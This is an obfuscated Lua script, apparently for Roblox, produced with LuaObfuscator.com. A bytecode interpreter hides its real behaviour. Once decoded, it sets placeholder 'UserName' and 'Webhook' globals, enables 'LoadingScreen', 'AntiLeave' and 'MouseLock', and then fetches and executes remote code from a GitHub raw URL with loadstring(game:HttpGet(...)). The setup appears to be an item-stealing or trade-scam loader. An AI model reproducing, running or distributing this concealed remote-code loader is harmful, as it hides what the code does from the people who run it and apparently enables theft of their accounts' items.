
--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0;local v32;while true do if (v31==(2 -1)) then return v32;end if ((0 -0)==v31) then v32=v1(v16,v19,v19);v19=v19 + ((620 -(555 + 64)) -0) ;v31=2 -(932 -(857 + 74)) ;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + (570 -(367 + 201)) );v19=v19 + 2 ;return (v34 * (1183 -(214 + 713))) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=0 + 0 ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==(0 + 0)) then v36=v24();v37=v24();v35=1 + 0 ;end if (v35==(878 -(282 + 595))) then v38=1 + 0 ;v39=(v21(v37,998 -(915 + (854 -(201 + 571))) ,1657 -(1523 + 114) ) * ((2 + 0)^((1183 -(116 + 1022)) -13))) + v36 ;v35=(4442 -3375) -(68 + 997) ;end if (v35==((2 + 1) -0)) then if (v40==((4636 -3366) -(226 + 1044))) then if (v39==((0 -0) -0)) then return v41 * (0 -0) ;else local v104=0 -0 ;while true do if (v104==(117 -(32 + 85))) then v40=1 + 0 ;v38=(859 -(814 + 45)) + 0 ;break;end end end elseif (v40==(2838 -(368 + 423))) then return ((v39==(957 -(892 + 65))) and (v41 * ((2 -1)/((0 -0) -0)))) or (v41 * NaN) ;end return v8(v41,v40-(1877 -854) ) * (v38 + (v39/((444 -(416 + 26))^(402 -(87 + 263))))) ;end if (v35==(182 -(67 + 113))) then v40=v21(v37,16 + 5 ,75 -44 );v41=((v21(v37,470 -(145 + 293) )==1) and  -(1 + 0)) or (3 -2) ;v35=955 -(44 + 758 + 150) ;end end end v26=nil;function v26(v42)local v43;if  not v42 then v42=v24();if (v42==(0 + 0)) then return "";end end v43=v3(v16,v19,(v19 + v42) -1 );v19=v19 + v42 ;local v44={};for v69=886 -(261 + 624) , #v43 do v44[v69]=v2(v1(v3(v43,v69,v69)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (v45==2) then v50=nil;v51=nil;v45=8 -5 ;end if (v45~=(0 -0)) then else v46=114 -(4 + 110) ;v47=nil;v45=1;end if (v45==3) then v52=nil;v53=nil;v45=4;end if (v45==4) then while true do if (v46~=1) then else local v98=0;local v99;while true do if ((584 -(57 + 527))~=v98) then else v99=0;while true do if (v99==0) then local v166=1427 -(41 + 1386) ;while true do if (v166~=1) then else v99=1;break;end if (v166~=0) then else v49=nil;v50=nil;v166=1;end end end if ((104 -(17 + 86))==v99) then v46=2 + 0 ;break;end end break;end end end if (v46~=0) then else local v100=0 -0 ;local v101;while true do if ((0 -0)==v100) then v101=166 -(122 + 44) ;while true do if (v101~=0) then else local v167=0 -0 ;while true do if (v167~=(3 -2)) then else v101=1 + 0 ;break;end if (v167==(0 + 0)) then v47=0 -0 ;v48=nil;v167=1;end end end if (v101~=1) then else v46=1;break;end end break;end end end if (v46==2) then local v102=0;local v103;while true do if (v102~=(65 -(30 + 35))) then else v103=0;while true do if ((0 + 0)~=v103) then else local v168=1257 -(1043 + 214) ;while true do if (v168==0) then v51=nil;v52=nil;v168=3 -2 ;end if (v168==1) then v103=1213 -(323 + 889) ;break;end end end if ((2 -1)==v103) then v46=3;break;end end break;end end end if (3==v46) then v53=nil;while true do local v105=580 -(361 + 219) ;local v106;while true do if ((320 -(53 + 267))==v105) then v106=0;while true do if (v106~=(0 + 0)) then else local v169=0;while true do if (v169==(414 -(15 + 398))) then v106=983 -(18 + 964) ;break;end if (v169==0) then if (v47~=1) then else local v202=0 -0 ;local v203;local v204;while true do if (v202==0) then v203=0 + 0 ;v204=nil;v202=1;end if (v202==1) then while true do if (v203==0) then v204=0 + 0 ;while true do if (v204==(850 -(20 + 830))) then local v211=0 + 0 ;while true do if (v211==0) then v52=v24();v53={};v211=1;end if (v211~=1) then else v204=127 -(116 + 10) ;break;end end end if (v204==2) then v47=1 + 1 ;break;end if (v204==1) then local v212=738 -(542 + 196) ;local v213;while true do if (0==v212) then v213=0;while true do if (v213~=0) then else local v222=0 -0 ;while true do if (v222==(0 + 0)) then for v225=1 + 0 ,v52 do local v226=0 + 0 ;local v227;local v228;local v229;while true do if (v226==(2 -1)) then v229=nil;while true do if (v227==0) then v228=v22();v229=nil;v227=1;end if ((2 -1)~=v227) then else if (v228==(1552 -(1126 + 425))) then v229=v22()~=(405 -(118 + 287)) ;elseif (v228==(7 -5)) then v229=v25();elseif (v228==3) then v229=v26();end v53[v225]=v229;break;end end break;end if (v226==0) then v227=0;v228=nil;v226=1;end end end v51[1124 -(118 + 1003) ]=v22();v222=1;end if (v222==(2 -1)) then v213=378 -(142 + 235) ;break;end end end if (v213==(4 -3)) then v204=2;break;end end break;end end end end break;end end break;end end end if (v47~=(1 + 1)) then else local v205=977 -(553 + 424) ;local v206;while true do if (v205==0) then v206=0 -0 ;while true do local v210=0 + 0 ;while true do if (v210==0) then if (v206~=(1 + 0)) then else return v51;end if (v206==(0 + 0)) then for v215=1,v24() do local v216=0;local v217;local v218;local v219;while true do if (v216~=(0 + 0)) then else v217=0 + 0 ;v218=nil;v216=2 -1 ;end if ((2 -1)==v216) then v219=nil;while true do if (1==v217) then while true do if (0==v218) then v219=v22();if (v21(v219,2 -1 ,1 + 0 )==(0 -0)) then local v230=753 -(239 + 514) ;local v231;local v232;local v233;local v234;while true do if (v230==2) then while true do if (v231==1) then local v238=0 + 0 ;local v239;while true do if (v238~=(1329 -(797 + 532))) then else v239=0 + 0 ;while true do if (v239~=1) then else v231=2;break;end if (0~=v239) then else local v249=0 + 0 ;local v250;while true do if ((0 -0)==v249) then v250=1202 -(373 + 829) ;while true do if (v250==(731 -(476 + 255))) then local v253=0;while true do if (v253~=1) then else v250=1;break;end if (v253~=0) then else v234={v23(),v23(),nil,nil};if (v232==0) then local v258=0;local v259;while true do if (v258==0) then v259=0 -0 ;while true do if (v259~=0) then else v234[5 -2 ]=v23();v234[242 -(64 + 174) ]=v23();break;end end break;end end elseif (v232==1) then v234[3]=v24();elseif (v232==(1 + 1)) then v234[3 -0 ]=v24() -((338 -(144 + 192))^16) ;elseif (v232==3) then local v264=216 -(42 + 174) ;while true do if (v264~=0) then else v234[3 + 0 ]=v24() -(2^(14 + 2)) ;v234[4]=v23();break;end end end v253=1;end end end if ((1 + 0)~=v250) then else v239=1;break;end end break;end end end end break;end end end if (v231~=0) then else local v240=0;local v241;while true do if (v240~=0) then else v241=0;while true do if ((1504 -(363 + 1141))==v241) then local v251=1580 -(1183 + 397) ;while true do if (v251==0) then v232=v21(v219,5 -3 ,3);v233=v21(v219,4,5 + 1 );v251=1 + 0 ;end if (v251==(1976 -(1913 + 62))) then v241=1 + 0 ;break;end end end if (v241==(2 -1)) then v231=1934 -(565 + 1368) ;break;end end break;end end end if (v231==2) then local v242=0;local v243;local v244;while true do if (v242~=0) then else v243=0;v244=nil;v242=1;end if (v242==(3 -2)) then while true do if (v243==(1661 -(1477 + 184))) then v244=0;while true do if (v244~=(1 -0)) then else v231=3 + 0 ;break;end if (0~=v244) then else local v252=0;while true do if (v252==(856 -(564 + 292))) then if (v21(v233,1,1)==(1 -0)) then v234[5 -3 ]=v53[v234[306 -(244 + 60) ]];end if (v21(v233,2,2 + 0 )==(477 -(41 + 435))) then v234[1004 -(938 + 63) ]=v53[v234[3 + 0 ]];end v252=1126 -(936 + 189) ;end if (v252~=1) then else v244=1;break;end end end end break;end end break;end end end if (v231==(1 + 2)) then if (v21(v233,1616 -(1565 + 48) ,3)==(1 + 0)) then v234[1142 -(782 + 356) ]=v53[v234[271 -(176 + 91) ]];end v48[v215]=v234;break;end end break;end if (v230==(2 -1)) then v233=nil;v234=nil;v230=2;end if (v230==0) then local v235=0 -0 ;local v236;while true do if ((1092 -(975 + 117))==v235) then v236=1875 -(157 + 1718) ;while true do if (v236~=(0 + 0)) then else local v248=0 -0 ;while true do if (v248==(0 -0)) then v231=0;v232=nil;v248=1019 -(697 + 321) ;end if (v248==1) then v236=1;break;end end end if (v236==(2 -1)) then v230=1 -0 ;break;end end break;end end end end end break;end end break;end if (v217~=0) then else local v223=0;while true do if (v223~=(0 -0)) then else v218=0 + 0 ;v219=nil;v223=1 -0 ;end if (v223~=(2 -1)) then else v217=1;break;end end end end break;end end end for v220=1,v24() do v49[v220-1 ]=v29();end v206=1228 -(322 + 905) ;end break;end end end break;end end end v169=1;end end end if ((612 -(602 + 9))~=v106) then else if (v47~=(1189 -(449 + 740))) then else local v200=872 -(826 + 46) ;local v201;while true do if (v200==0) then v201=947 -(245 + 702) ;while true do if (v201~=(0 -0)) then else local v207=0;local v208;while true do if (v207==0) then v208=0;while true do if (v208==0) then local v214=0;while true do if ((0 + 0)==v214) then v48={};v49={};v214=1899 -(260 + 1638) ;end if (v214~=1) then else v208=1;break;end end end if (v208~=(441 -(382 + 58))) then else v201=1;break;end end break;end end end if (v201==(6 -4)) then v47=1;break;end if (v201==(1 + 0)) then local v209=0 -0 ;while true do if (v209~=(2 -1)) then else v201=1207 -(902 + 303) ;break;end if (v209==0) then v50={};v51={v48,v49,nil,v50};v209=1691 -(1121 + 569) ;end end end end break;end end end break;end end break;end end end break;end end break;end if ((215 -(22 + 192))==v45) then v48=nil;v49=nil;v45=685 -(483 + 200) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v54)if (v1(v54,2)==79) then local v85=0;while true do if (v85==0) then v20=v0(v3(v54,1,1));return "";end end else local v86=v2(v0(v54,16));if v20 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v86,v20);v20=nil;v92=1;end end else return v86;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v55=1463 -(1404 + 59) ;local v56;local v57;local v58;local v59;while true do if (v55==((0 + 0) -0)) then v56,v57,v58,v59=v1(v16,v19,v19 + (3 -0) );v19=v19 + (769 -((704 -(141 + 95)) + 297)) ;v55=563 -(329 + 5 + 228) ;end if (v55==((7 -4) -2)) then return (v59 * ((93483594 -54595508) -22110870)) + (v58 * 65536) + (v57 * (463 -207)) + v56 ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v71=v63;local v72=v64;local v73=v65;local v74=v28;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -1 ;local v80={};local v81={};for v87=0,v79 do if (v87>=v73) then v77[v87-v73 ]=v78[v87 + 1 ];else v81[v87]=v78[v87 + 1 ];end end local v82=(v79-v73) + 1 ;local v83;local v84;while true do v83=v71[v75];v84=v83[1];if (v84<=5) then if (v84<=2) then if (v84<=0) then do return;end elseif (v84>1) then v81[v83[2]]=v83[3];else local v114=0;local v115;local v116;local v117;local v118;while true do if (v114==1) then v76=(v117 + v115) -1 ;v118=0;v114=2;end if (v114==2) then for v194=v115,v76 do v118=v118 + 1 ;v81[v194]=v116[v118];end break;end if (v114==0) then v115=v83[2];v116,v117=v74(v81[v115](v13(v81,v115 + 1 ,v83[3])));v114=1;end end end elseif (v84<=3) then local v107=0;while true do if (v107==5) then v62[v83[3]]=v81[v83[2]];v75=v75 + 1 ;v83=v71[v75];v107=6;end if (v107==6) then v81[v83[2]]=v62[v83[3]];v75=v75 + 1 ;v83=v71[v75];v107=7;end if (v107==7) then v81[v83[2]][v83[3]]=v83[4];v75=v75 + 1 ;v83=v71[v75];v107=8;end if (0==v107) then v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v107=1;end if (3==v107) then v62[v83[3]]=v81[v83[2]];v75=v75 + 1 ;v83=v71[v75];v107=4;end if (v107==1) then v62[v83[3]]=v81[v83[2]];v75=v75 + 1 ;v83=v71[v75];v107=2;end if (v107==2) then v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v107=3;end if (v107==4) then v81[v83[2]]=v83[3];v75=v75 + 1 ;v83=v71[v75];v107=5;end if (v107==9) then v81[v83[2]][v83[3]]=v83[4];break;end if (8==v107) then v81[v83[2]]=v62[v83[3]];v75=v75 + 1 ;v83=v71[v75];v107=9;end end elseif (v84>4) then v62[v83[3]]=v81[v83[2]];else v81[v83[2]]=v83[3]~=0 ;end elseif (v84<=8) then if (v84<=6) then v81[v83[2]]=v62[v83[3]];elseif (v84>7) then local v122=v83[2];local v123=v81[v83[3]];v81[v122 + 1 ]=v123;v81[v122]=v123[v83[4]];else local v127=0;local v128;local v129;local v130;local v131;local v132;while true do if (1==v127) then v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v62[v83[3]];v75=v75 + 1 ;v83=v71[v75];v127=2;end if (v127==5) then v132=v83[2];v129,v130=v74(v81[v132](v13(v81,v132 + 1 ,v83[3])));v76=(v130 + v132) -1 ;v128=0;for v197=v132,v76 do v128=v128 + 1 ;v81[v197]=v129[v128];end v127=6;end if (v127==0) then v128=nil;v129,v130=nil;v131=nil;v132=nil;v81[v83[2]][v83[3]]=v83[4];v127=1;end if (2==v127) then v81[v83[2]]=v62[v83[3]];v75=v75 + 1 ;v83=v71[v75];v132=v83[2];v131=v81[v83[3]];v127=3;end if (v127==6) then v75=v75 + 1 ;v83=v71[v75];v132=v83[2];v81[v132]=v81[v132](v13(v81,v132 + 1 ,v76));v75=v75 + 1 ;v127=7;end if (v127==4) then v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3]~=0 ;v75=v75 + 1 ;v83=v71[v75];v127=5;end if (v127==7) then v83=v71[v75];v81[v83[2]]();v75=v75 + 1 ;v83=v71[v75];do return;end break;end if (v127==3) then v81[v132 + 1 ]=v131;v81[v132]=v131[v83[4]];v75=v75 + 1 ;v83=v71[v75];v81[v83[2]]=v83[3];v127=4;end end end elseif (v84<=9) then local v110=0;local v111;while true do if (v110==0) then v111=v83[2];v81[v111]=v81[v111](v13(v81,v111 + 1 ,v76));break;end end elseif (v84>10) then v81[v83[2]]();else v81[v83[2]][v83[3]]=v83[4];end v75=v75 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v66,v67,v68)if v68 then local v90=(v66/(2^(v67-(1 + 0))))%((5 -3)^(((v68-(1 + 0)) -(v67-(1 + 0))) + 1 + (0 -0))) ;return v90-(v90%(1 -0)) ;else local v91=(2 + 0 + 0)^(v67-(164 -((857 -(574 + 191)) + 71))) ;return (((v66%(v91 + v91))>=v91) and (1 + 0)) or (0 -0) ;end end v22=nil;v18=2;end end end v15("LOL!0F3O0003083O00557365724E616D65030D3O00557365724E616D65204865726503073O00576562682O6F6B030C3O00576562682O6F6B204865726503093O00557365724E616D653203113O00326E6420557365724E616D65204865726503023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012033O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00304O0008000900124O00073O00304O000A00090012063O00073O0030073O000B000900124O000C3O00122O0001000D3O00202O00010001000E00122O0003000F6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
